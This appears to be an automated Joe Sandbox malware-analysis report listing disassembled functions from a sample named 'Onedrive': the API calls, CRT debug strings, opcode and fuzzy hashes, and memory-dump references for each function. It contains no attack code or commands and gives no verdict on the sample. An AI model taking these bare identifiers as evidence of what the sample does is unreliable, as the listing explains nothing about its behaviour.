GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6104F6F78
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6104F6FB0
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6104F6FC5

Strings

https://go.microsoft.com/fwlink/?LinkId=521839, xrefs: 00007FF6104F6EDE, 00007FF6104F6F00

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$ErrorExecuteFreeLastProcessShellmemset
String ID: https://go.microsoft.com/fwlink/?LinkId=521839
API String ID: 1345967500-776123123
Opcode ID: 3c8ff984376a63563433bb517d180c30302da773993a283fbe1b66f1df6943b3
Instruction ID: 5a0122f0a7658c7b9c251caf0728c3eaf05e999c29fd1066c16131bcd36461d7
Opcode Fuzzy Hash: 3c8ff984376a63563433bb517d180c30302da773993a283fbe1b66f1df6943b3
Instruction Fuzzy Hash: B4411E32B08E02EAEF009F79E5903BD27A9EF89B68F554435DA0EC7795DE38E4148350

Function 00007FF8A032DAA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 93COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A032DAB8
__crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A032DAC2

Part of subcall function 00007FF8A0320B40: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0320B58

Part of subcall function 00007FF8A0320D10: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0320D65

Part of subcall function 00007FF8A03253C0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03253D3
Part of subcall function 00007FF8A03253C0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03253DD

Strings

_fclose_nolock_internal, xrefs: 00007FF8A032DB6E
minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp, xrefs: 00007FF8A032DB10, 00007FF8A032DB67
%ls, xrefs: 00007FF8A032DAFB
stream.valid(), xrefs: 00007FF8A032DAEF, 00007FF8A032DB75

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
String ID: %ls$_fclose_nolock_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
API String ID: 4164245112-3166852756
Opcode ID: 7981988369232ab8f8a893ab0169fe3df660103c30c3250769104b9faaa05007
Instruction ID: eb3a5a28e70163d54984636a1d2df0af9cd50147f76b3e3c39038c6068c96b7b
Opcode Fuzzy Hash: 7981988369232ab8f8a893ab0169fe3df660103c30c3250769104b9faaa05007
Instruction Fuzzy Hash: 46412C32A1EE43A5EB10EB10E4913AA6764FB953D0F500135E68E4B7EADF7DE944CB40

Function 00007FF8A0324060 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

_aligned_msize.LIBCMTD ref: 00007FF8A0324197
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A03241C4

Strings

minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 00007FF8A03241AD
strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit]), xrefs: 00007FF8A03241BB
fp_format_nan_or_infinity, xrefs: 00007FF8A03241B4
], xrefs: 00007FF8A03241A5

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: _aligned_msize_invoke_watson_if_error
String ID: ]$fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
API String ID: 1871870440-1759674166
Opcode ID: 40cbd8fc9f1d8437863cf3e661c1112528bfb2bcb4896d92b27ef83705352061
Instruction ID: 8dafad37136650c83148f6144f8969700ff57985560bb46d1c1521def6a0a8c8
Opcode Fuzzy Hash: 40cbd8fc9f1d8437863cf3e661c1112528bfb2bcb4896d92b27ef83705352061
Instruction Fuzzy Hash: 9341103261DA8696E750CB29E48032ABBE0E799784F104126F7DE87BA9DB7DD450CF00

Function 00007FF8A032D940 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A032D958
__crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A032D962

Strings

_fclose_internal, xrefs: 00007FF8A032DA0E
minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp, xrefs: 00007FF8A032D9B0, 00007FF8A032DA07
%ls, xrefs: 00007FF8A032D99B
stream.valid(), xrefs: 00007FF8A032D98F, 00007FF8A032DA15

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
String ID: %ls$_fclose_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
API String ID: 614740146-2931739134
Opcode ID: 39e73b053c62ea83c06c082d52e2ef81818531d9a583e9f0d21007848b92ed5a
Instruction ID: 040c4fff8b522096b9d9ca2ff285ba4aa08bdbef82899ce5e96164247dd740c4
Opcode Fuzzy Hash: 39e73b053c62ea83c06c082d52e2ef81818531d9a583e9f0d21007848b92ed5a
Instruction Fuzzy Hash: 8A311B31A1EE83A6EB10EB10E4513AA67A4FB953C0F501135F68E4BBAADF7DD544CB40

Function 00007FF6104FA23C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

SLGetProductSkuInformation.SLC(?,?,?,?,00000000,00000000,?,00007FF6104FA536,?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA281
LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,00007FF6104FA536,?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA2AD
SLGetProductSkuInformation.SLC(?,?,?,?,00000000,00000000,?,00007FF6104FA536,?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA2E2
LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,00007FF6104FA536,?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA311

Strings

DependsOn, xrefs: 00007FF6104FA2CB
Family, xrefs: 00007FF6104FA25E

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: FreeInformationLocalProduct
String ID: DependsOn$Family
API String ID: 942381732-1323192929
Opcode ID: f562f756d88fc8698ec4015293d1e350d35409882a8b0caa2c134b110c04492a
Instruction ID: 05b6b4fbb7bb79473d7ae23c9ceeaf58e059cc683fcf3447a955c1cf7394e1f5
Opcode Fuzzy Hash: f562f756d88fc8698ec4015293d1e350d35409882a8b0caa2c134b110c04492a
Instruction Fuzzy Hash: 47218772B18F42E6EF008F55A4845BDB7A8FB89FA4B568135DA4E83714DF39E4618700

Function 00007FF8A033EC60 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_abstract_cw.LIBCMTD ref: 00007FF8A033ECCD
_hw_cw.LIBCMTD ref: 00007FF8A033ED0A
_abstract_cw.LIBCMTD ref: 00007FF8A033ED6A

Strings

%ls, xrefs: 00007FF8A033EC85
(mask&~(_MCW_DN|_MCW_EM|_MCW_RC))==0, xrefs: 00007FF8A033EC79
minkernel\crts\ucrt\src\appcrt\tran\amd64\ieee.c, xrefs: 00007FF8A033EC9A

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: _abstract_cw$_hw_cw
String ID: %ls$(mask&~(_MCW_DN|_MCW_EM|_MCW_RC))==0$minkernel\crts\ucrt\src\appcrt\tran\amd64\ieee.c
API String ID: 787819578-4254588316
Opcode ID: 3c7496dc418791ef6ba757f371fe8972095d737ac954d17e3b05e68fa93950f6
Instruction ID: fede9bb7cb2519b44bb6aed6636a97f3a093cbffab26b3d68d0ad58e631db673
Opcode Fuzzy Hash: 3c7496dc418791ef6ba757f371fe8972095d737ac954d17e3b05e68fa93950f6
Instruction Fuzzy Hash: FD31F032A2DA439BD754DB14E49162A77A1FF84780F401439F69A87BE9DF2CE800CF45

Function 00007FF8A03253C0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 46COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03253D3
__crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03253DD

Strings

minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp, xrefs: 00007FF8A032542B, 00007FF8A0325465
%ls, xrefs: 00007FF8A0325416
_fileno, xrefs: 00007FF8A032546C
stream.valid(), xrefs: 00007FF8A032540A, 00007FF8A0325473

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
API String ID: 614740146-3741990651
Opcode ID: fbaf7d3e15aa925d7e701ef2d92dac18c3d8396f506b789b98d13b46ce91094e
Instruction ID: fa3ce56b6590a27beb6bee47d9c0b87f6526453aa72214853e7fe7f9785e3d62
Opcode Fuzzy Hash: fbaf7d3e15aa925d7e701ef2d92dac18c3d8396f506b789b98d13b46ce91094e
Instruction Fuzzy Hash: 23216A75A1EE43A6EB509B10E4503AAA260FB943C5F802032E68E4B795DF7DE644CB00

Function 00007FF6104FBB50 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

StrToID.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB6B
?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB7E
?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB96
?SetValue@Element@DirectUI@@QEAAJP6APEBUPropertyInfo@2@XZHPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBBD0
?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBBDF

Strings

ErrorCID, xrefs: 00007FF6104FBB64

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Direct$Value@$Element@V12@$CreateDescendent@E__@@@FindInfo@2@PropertyRelease@String@Value@2@@
String ID: ErrorCID
API String ID: 3965188616-3250631935
Opcode ID: 1ee354ba4db03265580357cb67ba2b8d0dd7a090ad87e17df1e797e7864e6d7e
Instruction ID: 784c40771f161992bffa3a6f59f344b123a04b7184848dccf0ef57afc783bdb5
Opcode Fuzzy Hash: 1ee354ba4db03265580357cb67ba2b8d0dd7a090ad87e17df1e797e7864e6d7e
Instruction Fuzzy Hash: A3114C36A0CE82D2EF145B16A95007CBAA4FB8AFA4B489130DD0E87759CF3CE4518701

Function 00007FF8A0329590 Relevance: 9.3, APIs: 6, Instructions: 300COMMON

Download Yara Rule

APIs

setSBCS.LIBCMTD ref: 00007FF8A03295C5
CPtoLocaleName.LIBCMTD ref: 00007FF8A0329769

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: LocaleName
String ID:
API String ID: 1723996188-0
Opcode ID: 90812c785ae45d4dbd0d637aedc98363c098c1fc638e0205df71d1a71fe8337e
Instruction ID: 15a2630fa223d89093a266462c39cb5251cef265e3788eda7390ea9620a459ed
Opcode Fuzzy Hash: 90812c785ae45d4dbd0d637aedc98363c098c1fc638e0205df71d1a71fe8337e
Instruction Fuzzy Hash: B0E1A83260DA82DBE764CB19E49422AB7E0F79C794F144236E68F877A8DB7CD5418F04

Function 00007FF6104F3E90 Relevance: 9.3, APIs: 6, Instructions: 266memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00007FF6104F4045
GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F4055
HeapFree.KERNEL32(?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F4069
SysFreeString.OLEAUT32 ref: 00007FF6104F4205
GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F4215
HeapFree.KERNEL32(?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F4229

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: FreeHeap$ProcessString
String ID:
API String ID: 457288585-0
Opcode ID: b58d795c223e933af8178aaedf77eb8d46f6f4fa86935d1c62db7cd3e1f41b76
Instruction ID: 678dc069fcef5df56800e3ea548665cac3a9eb54c0a33d98715208f3bdd26174
Opcode Fuzzy Hash: b58d795c223e933af8178aaedf77eb8d46f6f4fa86935d1c62db7cd3e1f41b76
Instruction Fuzzy Hash: 0891F621B18F86E5ED509B2AD9483B9A259AF85FF1F488231DE2D8B7C5DF3CE1558300

Function 00007FF6104F4664 Relevance: 9.1, APIs: 6, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00007FF6104F4748
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F4035,00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F4758
HeapFree.KERNEL32(?,?,?,00007FF6104F4035,00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F476C
SysFreeString.OLEAUT32 ref: 00007FF6104F478C
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F4035,00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F479C
HeapFree.KERNEL32(?,?,?,00007FF6104F4035,00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F47B0

Part of subcall function 00007FF6104F2E94: CompareStringEx.KERNEL32 ref: 00007FF6104F2EC4

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: FreeHeap$String$Process$Compare
String ID:
API String ID: 3197231773-0
Opcode ID: 56f79bf90f11542464ed531c6df6cde9723808e7608c5b96574c2fd091f9801c
Instruction ID: 8ef79a86df36d5fb92b292e2efcf91ecd536180c54e277423d80ee17b7faa6fb
Opcode Fuzzy Hash: 56f79bf90f11542464ed531c6df6cde9723808e7608c5b96574c2fd091f9801c
Instruction Fuzzy Hash: F7415B22619E41E6EE00EF5AE4943BDA7A5FB99F95F488131DA0D8A355DF7CE118C300

Function 00007FF6104FB4F0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70 ref: 00007FF6104FB531
?Release@Value@DirectUI@@QEAAXXZ.DUI70 ref: 00007FF6104FB544

Part of subcall function 00007FF6104FAF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FAFB3
Part of subcall function 00007FF6104FAF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FB05A

Part of subcall function 00007FF6104FBB50: StrToID.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB6B
Part of subcall function 00007FF6104FBB50: ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB7E
Part of subcall function 00007FF6104FBB50: ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB96

Part of subcall function 00007FF6104FB6D8: ?GetSelection@TouchEdit2@DirectUI@@QEAAJPEAJ0@Z.DUI70(?,?,00000000,00007FF6104FB9D1), ref: 00007FF6104FB6F6

Part of subcall function 00007FF6104FB084: memset.MSVCRT ref: 00007FF6104FB0B4
Part of subcall function 00007FF6104FB084: memset.MSVCRT ref: 00007FF6104FB0D7

towlower.MSVCRT ref: 00007FF6104FB5E5
towlower.MSVCRT ref: 00007FF6104FB5F8
?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF6104FB61D
?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF6104FB62F

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Direct$Element@String@$ContentValue@$Edit2@Release@TouchV12@Value@2@@memsettowlower$CaretCreateDescendent@E__@@@FindPosition@Selection@
String ID:
API String ID: 1728635042-0
Opcode ID: f8185b381dd9cae6fd31baaa39e3e0ceb803fb853cf683b02eb1faf8e9495004
Instruction ID: d2a6cd834f4bd35c6165284aa3bc8417f1dcad214acb9bafded875f6023d9a34
Opcode Fuzzy Hash: f8185b381dd9cae6fd31baaa39e3e0ceb803fb853cf683b02eb1faf8e9495004
Instruction Fuzzy Hash: F8418E22B04E42EAEF109B6AD4505BC77A4FB89FA9B854131DE0D97748DF38E856C381

Function 00007FF6104FBF50 Relevance: 9.1, APIs: 6, Instructions: 88COMMON

Download Yara Rule

APIs

FindResourceExW.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBF89
LoadResource.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBFA6
LockResource.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBFBA
GetLastError.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC026
GetLastError.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC03C
GetLastError.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC052

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: ErrorLastResource$FindLoadLock
String ID:
API String ID: 2613642035-0
Opcode ID: e014c53c1afe5e2e54386c9475865295f837bfc86f6c95a8f9d82f449c7950be
Instruction ID: 69a803112df2af52e4dd272f7da48883176412dd10ccb7336e858583290c9d5b
Opcode Fuzzy Hash: e014c53c1afe5e2e54386c9475865295f837bfc86f6c95a8f9d82f449c7950be
Instruction Fuzzy Hash: 7031AB32A09F86DAEF144F9AA580239B6A4FF89FA0B048134DA4EC7354DF3CE8519714

Function 00007FF8A0307C80 Relevance: 9.0, APIs: 6, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

__FrameHandler3::StateFromControlPc.LIBVCRUNTIMED ref: 00007FF8A0307C9D
_GetEstablisherFrame.LIBCMTD ref: 00007FF8A0307CBA

Part of subcall function 00007FF8A0304850: __FrameHandler3::StateFromControlPc.LIBVCRUNTIMED ref: 00007FF8A030487E
Part of subcall function 00007FF8A0304850: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8A0304916

__GetUnwindTryBlock.LIBCMTD ref: 00007FF8A0307CCF

Part of subcall function 00007FF8A0305710: _GetEstablisherFrame.LIBCMTD ref: 00007FF8A0305737

__FrameHandler3::SetState.LIBVCRUNTIMED ref: 00007FF8A0307CE9
__SetUnwindTryBlock.LIBCMTD ref: 00007FF8A0307D02

Part of subcall function 00007FF8A0305790: _GetEstablisherFrame.LIBCMTD ref: 00007FF8A03057BC

__GetUnwindTryBlock.LIBCMTD ref: 00007FF8A0307D19

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Frame$BlockEstablisherHandler3::StateUnwind$ControlFrom$EntryFunctionLookup
String ID:
API String ID: 523381305-0
Opcode ID: 1c938a9c421dafcbaaf4c7f9a1c99e9a12375c26f6b421891ec9a4fd2c3daaf4
Instruction ID: 19d4675f834eb36528318e65601a869be722c4249117bce0c9037a2730e53509
Opcode Fuzzy Hash: 1c938a9c421dafcbaaf4c7f9a1c99e9a12375c26f6b421891ec9a4fd2c3daaf4
Instruction Fuzzy Hash: 52116476A1AA8292C620DF99E44106BA770F7CABD4F605526EA8C43B59CE6DD5408F40

Function 00007FF8A0328D00 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF8A0328D43
__crtLCMapStringA.LIBCMTD ref: 00007FF8A0328E93
__crtLCMapStringA.LIBCMTD ref: 00007FF8A0328EEB

Strings

z, xrefs: 00007FF8A032906F
, xrefs: 00007FF8A0328DF6

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

